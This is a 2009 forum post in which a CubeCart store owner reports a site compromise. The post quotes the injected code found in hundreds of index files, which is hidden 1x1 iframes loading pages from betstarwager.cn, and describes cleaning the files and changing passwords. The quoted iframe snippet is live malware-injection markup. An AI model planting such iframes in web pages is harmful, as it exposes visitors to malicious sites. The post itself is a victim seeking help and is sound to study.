Guest biotox Posted March 3, 2009 Share Posted March 3, 2009 Wonderful. I finally get everything working again, and this happens: ?><html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola84" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola80" width=1 height=1 style="visibility: hidden"></iframe></body></html> its located on every index.php. CC 4.2.3 with patched ini.inc.php, on a 256 AES SSL Any idea's? I've already removed the offending code on all index.php's, (this code also shutdown the webstore saying error on line 108 on index.php) I've changed all passwords on the server/ftp as well. Is there any other steps to take so this doesnt happen again? <edit> oh yeah, google shows a few other entries like this, one was an sql injection, and the other guy's computer wasnt secure. in "cocacola80" the numbers seemed to change as well.</edit> <edit2> another quick note, google says the mentioned site is a "bad" site, so i wouldnt recommend going there </edit2> <edit3> Wrong again. its not just the index.php, .htm and .html were affected as well about 300 index.* files were modified. and i was wrong about getting all the .php files too. there's over 300. i'm looking for a bath file editor </edit3> <edit4> Found a batch editor called "Useful File Utilities", which had an add on for a batch replace to replace strings from multiple files (also makes backup of the files it edits), used it, and about 20 seconds later, all strings have been removed and re-uploaded. so far so good. still dont know the cause of it. </edit4> Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.